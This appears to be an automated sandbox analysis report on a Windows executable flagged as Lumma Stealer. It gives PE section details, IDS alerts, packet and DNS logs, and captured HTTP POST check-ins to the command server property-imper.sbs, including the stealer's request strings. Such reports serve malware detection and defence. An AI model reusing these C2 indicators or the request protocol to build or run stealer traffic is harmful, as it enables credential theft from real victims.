                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], ah
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [ecx], ah
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax+eax*4], cl
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              0x10000x560000x262003924cca5ba483b2e7b8ab76a507a2ef2False0.9992763831967213MPEG ADTS, layer I, v2, 224 kbps, 22.05 kHz, Stereo7.977987189441114IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0x570000x2b00x200f55ffff65d35f78f935c29dcfce40891False0.796875data6.059637642783932IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              0x590000x2ab0000x2004b45554346ac26a1583ad09dc68f7c49unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              xwjcifzz0x3040000x19e0000x19dc00b99990ced3f58b3cf7dc650e2321bf68False0.9946616550226586data7.954800437299881IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              olfigpve0x4a20000x10000x60052e72e1bf18b36cf7c9abac27b440be3False0.599609375data5.115294449744216IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .taggant0x4a30000x30000x2200fd2888cee58924c1e8adcdbc8b5040ebFalse0.06789981617647059DOS executable (COM)0.8313555106471683IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_MANIFEST0x4a19340x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                              DLLImport
                                                                              kernel32.dlllstrcpy
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-11-23T21:08:07.550595+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049700104.21.33.116443TCP
                                                                              2024-11-23T21:08:08.275185+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1049700104.21.33.116443TCP
                                                                              2024-11-23T21:08:08.275185+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049700104.21.33.116443TCP
                                                                              2024-11-23T21:08:09.568329+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049701104.21.33.116443TCP
                                                                              2024-11-23T21:08:10.328267+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1049701104.21.33.116443TCP
                                                                              2024-11-23T21:08:10.328267+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049701104.21.33.116443TCP
                                                                              2024-11-23T21:08:12.272141+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049703104.21.33.116443TCP
                                                                              2024-11-23T21:08:13.160352+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1049703104.21.33.116443TCP
                                                                              2024-11-23T21:08:14.599423+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049709104.21.33.116443TCP
                                                                              2024-11-23T21:08:17.273606+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049715104.21.33.116443TCP
                                                                              2024-11-23T21:08:19.821441+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049721104.21.33.116443TCP
                                                                              2024-11-23T21:08:22.919051+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049733104.21.33.116443TCP
                                                                              2024-11-23T21:08:22.923838+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.1049733104.21.33.116443TCP
                                                                              2024-11-23T21:08:29.620128+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049748104.21.33.116443TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Nov 23, 2024 21:08:06.078469992 CET49700443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:06.078505993 CET44349700104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:06.078639984 CET49700443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:06.079936981 CET49700443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:06.079952002 CET44349700104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:07.550452948 CET44349700104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:07.550595045 CET49700443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:07.556806087 CET49700443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:07.556817055 CET44349700104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:07.557096004 CET44349700104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:07.604259968 CET49700443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:07.613468885 CET49700443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:07.613496065 CET49700443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:07.613622904 CET44349700104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:08.275217056 CET44349700104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:08.275342941 CET44349700104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:08.275394917 CET49700443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:08.277622938 CET49700443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:08.277645111 CET44349700104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:08.277672052 CET49700443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:08.277678967 CET44349700104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:08.343125105 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:08.343168974 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:08.343333960 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:08.347032070 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:08.347057104 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:09.568257093 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:09.568329096 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:09.569823027 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:09.569832087 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:09.570080042 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:09.571552992 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:09.571604013 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:09.571645021 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.328269005 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.328332901 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.328366041 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.328413963 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:10.328428030 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.328465939 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:10.328471899 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.328510046 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.328550100 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:10.328557014 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.342799902 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.342905045 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.342907906 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:10.342919111 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.343013048 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:10.343018055 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.385400057 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:10.385423899 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.432281017 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:10.450999022 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.494776011 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:10.520853996 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.520956993 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.521080017 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.521123886 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:10.521156073 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:10.521245003 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:10.521260977 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.521291018 CET49701443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:10.521296024 CET44349701104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.778716087 CET49703443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:10.778758049 CET44349703104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:10.778856039 CET49703443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:10.779150009 CET49703443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:10.779169083 CET44349703104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:12.271908045 CET44349703104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:12.272140980 CET49703443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:12.273436069 CET49703443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:12.273446083 CET44349703104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:12.273745060 CET44349703104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:12.275006056 CET49703443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:12.280071020 CET49703443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:12.280132055 CET44349703104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:13.160378933 CET44349703104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:13.160572052 CET44349703104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:13.160640001 CET49703443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:13.160701036 CET49703443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:13.160715103 CET44349703104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:13.323801041 CET49709443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:13.323844910 CET44349709104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:13.323932886 CET49709443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:13.324315071 CET49709443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:13.324337959 CET44349709104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:14.599198103 CET44349709104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:14.599422932 CET49709443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:14.600783110 CET49709443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:14.600794077 CET44349709104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:14.601035118 CET44349709104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:14.602308035 CET49709443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:14.602509022 CET49709443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:14.602540970 CET44349709104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:14.602593899 CET49709443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:14.643332958 CET44349709104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:15.503843069 CET44349709104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:15.504036903 CET44349709104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:15.504121065 CET49709443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:15.504179955 CET49709443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:15.504196882 CET44349709104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:15.769676924 CET49715443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:15.769730091 CET44349715104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:15.769805908 CET49715443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:15.770113945 CET49715443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:15.770128965 CET44349715104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:17.273485899 CET44349715104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:17.273606062 CET49715443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:17.274893045 CET49715443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:17.274900913 CET44349715104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:17.275161982 CET44349715104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:17.276626110 CET49715443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:17.276762009 CET49715443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:17.276798010 CET44349715104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:17.276870012 CET49715443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:17.276880980 CET44349715104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:18.203686953 CET44349715104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:18.203964949 CET44349715104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:18.204027891 CET49715443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:18.234205008 CET49715443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:18.234230995 CET44349715104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:18.600997925 CET49721443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:18.601048946 CET44349721104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:18.601114035 CET49721443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:18.601687908 CET49721443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:18.601701975 CET44349721104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:19.821181059 CET44349721104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:19.821440935 CET49721443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:19.822797060 CET49721443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:19.822812080 CET44349721104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:19.823080063 CET44349721104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:19.824471951 CET49721443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:19.824584007 CET49721443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:19.824592113 CET44349721104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:20.528189898 CET44349721104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:20.528312922 CET44349721104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:20.528368950 CET49721443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:20.533219099 CET49721443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:20.533240080 CET44349721104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:21.487217903 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:21.487281084 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:21.487360001 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:21.487759113 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:21.487776995 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:22.918771982 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:22.919050932 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:22.920707941 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:22.920717955 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:22.920941114 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:22.922390938 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:22.923226118 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:22.923245907 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:22.923340082 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:22.923362970 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:22.923458099 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:22.923484087 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:22.923602104 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:22.923619032 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:22.923760891 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:22.923779964 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:22.923907042 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:22.923932076 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:22.923944950 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:22.924067020 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:22.924088955 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:22.971330881 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:22.971482038 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:22.971563101 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:23.015330076 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:23.015486956 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:23.015542030 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:23.015577078 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:23.063332081 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:23.063489914 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:23.107333899 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:23.645467043 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:29.366940022 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:29.367070913 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:29.367223978 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:29.367417097 CET49733443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:29.367434978 CET44349733104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:29.463339090 CET49748443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:29.463396072 CET44349748104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:29.463473082 CET49748443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:29.463989973 CET49748443192.168.2.10104.21.33.116
                                                                              Nov 23, 2024 21:08:29.463999987 CET44349748104.21.33.116192.168.2.10
                                                                              Nov 23, 2024 21:08:29.620127916 CET49748443192.168.2.10104.21.33.116
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Nov 23, 2024 21:08:05.641125917 CET5223253192.168.2.101.1.1.1
                                                                              Nov 23, 2024 21:08:06.071086884 CET53522321.1.1.1192.168.2.10
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Nov 23, 2024 21:08:05.641125917 CET192.168.2.101.1.1.10xba37Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Nov 23, 2024 21:08:06.071086884 CET1.1.1.1192.168.2.100xba37No error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                              Nov 23, 2024 21:08:06.071086884 CET1.1.1.1192.168.2.100xba37No error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                              • property-imper.sbs
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.1049700104.21.33.1164437616C:\Users\user\Desktop\file.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-23 20:08:07 UTC265OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8
                                                                              Host: property-imper.sbs
                                                                              2024-11-23 20:08:07 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                              Data Ascii: act=life
                                                                              2024-11-23 20:08:08 UTC1014INHTTP/1.1 200 OK
                                                                              Date: Sat, 23 Nov 2024 20:08:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=l2ih326sttq1ej18dgbc3iahq6; expires=Wed, 19-Mar-2025 13:54:47 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iSPXFtlRrxOrRvD3Qs0tAtMgMJzkYgHey3XtADRVJTX5X01o%2FqcQI7E1itP9Kb4%2FJNm0ZrxG4mvqPvae4zOXXTfH4OyoTKiXxHpOR4JosgC0z7%2Fp0sbi7sJE8IyGgQERVeN9%2FhU%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e73ca18ebd27288-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1936&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4230&recv_bytes=909&delivery_rate=159859&cwnd=243&unsent_bytes=0&cid=46037a66defdc6eb&ts=755&x=0"
                                                                              2024-11-23 20:08:08 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                              Data Ascii: 2ok
                                                                              2024-11-23 20:08:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.1049701104.21.33.1164437616C:\Users\user\Desktop\file.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-23 20:08:09 UTC266OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 53
                                                                              Host: property-imper.sbs
                                                                              2024-11-23 20:08:09 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                              Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                              2024-11-23 20:08:10 UTC1009INHTTP/1.1 200 OK
                                                                              Date: Sat, 23 Nov 2024 20:08:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=d6i13g980n59mspvm5mjfk1tj0; expires=Wed, 19-Mar-2025 13:54:49 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kQP9CgigAe5RBHiSSrA4A7hsqf3oDLfCymlWo9rCO4RpmtgmzvDS1gaGnhTasvvedM4Bjj5PyeiD5SPnh3lwPvB7niY1hYMd8h73XpCx9aQp6LrOMPDoD6uyB4yVYCjOL%2BnxEXw%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e73ca259cca42b1-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2578&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=955&delivery_rate=1361940&cwnd=243&unsent_bytes=0&cid=3a41bf6021ad2e1b&ts=766&x=0"
